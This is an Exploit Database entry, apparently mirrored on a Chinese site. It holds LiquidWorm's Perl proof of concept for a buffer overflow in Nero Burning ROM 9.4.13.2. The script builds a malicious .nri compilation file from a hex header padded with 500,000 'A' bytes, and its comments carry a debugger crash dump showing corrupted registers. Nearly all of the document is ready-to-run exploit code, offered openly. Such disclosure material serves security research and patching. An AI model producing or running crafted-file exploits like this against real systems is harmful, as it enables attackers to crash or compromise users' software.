Nero Burning ROM 9.4.13.2 – ISO Compilation Local Buffer Invasion (PoC)

• Exploit Database
• 12 阅读

• 作者： LiquidWorm
  日期： 2010-02-22
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/11533/

• #!/usr/bin/perl
  #
  #
  # Title: Nero Burning ROM 9 (iso compilation) Local Buffer Invasion Proof Of Concept
  #
  #
  # Product web page: http://www.nero.com
  # Version tested: 9.4.13.2
  # OS platform used: Microsoft Windows XP Professional SP3 (English)
  #
  # Registers pick'a'chu:
  # ------------------------------------------------------------------------
  #
  # (adc.b30): Access violation - code c0000005 (first chance)
  # First chance exceptions are reported before any exception handling.
  # This exception may be expected and handled.
  # eax=41414141 ebx=00000000 ecx=0012ecf0 edx=00000000 esi=04c8acc8 edi=00e29890
  # eip=0057f53c esp=0012ec38 ebp=0012ed28 iopl=0 nv up ei pl nz na pe nc
  # cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00010206
  # Nero+0x17f53c:
  # 0057f53c 394204cmp dword ptr [edx+4],eax ds:0023:00000004=????????
  #
  # ------------------------------------------------------------------------
  #
  # Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic
  #
  # liquidworm gmail com
  #
  # Zero Science Lab - http://www.zeroscience.org
  #
  # 30.09.2009
  #
  # Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4927.php
  #
  
  
   
  ####
   ####
  ####
   #O ## O#
  #[*] ## [*]#
   ####
  $id="\xFF\xFE".
   	 "\xFF\x0E\x4E\x00".
  "\x65\x00\x72\x00\x6F".
  "\x00\x49\x00\x53\x00\x4F".
  #####===###_O----O_###===##### 
  "\x00\x30\x00\x2E\x00\x30\x00".
  "\x33\x00\x2E\x00\x30\x00\x31".
  "\x00\x0B\x00\x00\x00\x01".
   "\x00\x00\x00\x00\x00".
  "\x10\x4E".
  "\x45".
  "\x52".
  "\x4F".
  "\x20\x42\x55\x52\x4E\x49".
   "\x4E"."\x47\x20". "\x52".
   "\x4F"."\x4D\x00\x00"."\x00".
   "\x9C". "\x20\xBC\x4A\x9C". "\x20".
  "\xBC"."\x4A\xFF\xFF"."\xFF".
  "\xFF"."\xFF\xFF\xFF"."\xFF".
   "\x00". "\x00\x00". "\x00".
   "\x9F"."\x20". "\xBC"."\x4A".
   "\x01"."\x00". "\x00"."\x00".
  "\x00". "\x00". "\x00"."\x00".
  "\x01"."\x00\x00". "\x00\x01"."\x00".
  "\x00". "\x00".
  "\x01". "\x00".
   "\x00". "\x00".
   "\x00". "\x00".
   "\x00". "\x00";
  ###############################################
  ###############################################
  
  
  
  							$fl="Neeero.nri";$op="\x41" x 500000;
  							open nri, ">./$fl" || die "\nCan't open $fl: $!";
  							print nri $id.$op;
  							print "\n ~ Invasion started...\n";
  							sleep 1;close nri;
  							print "\n ~ File $fl invaded host.\n";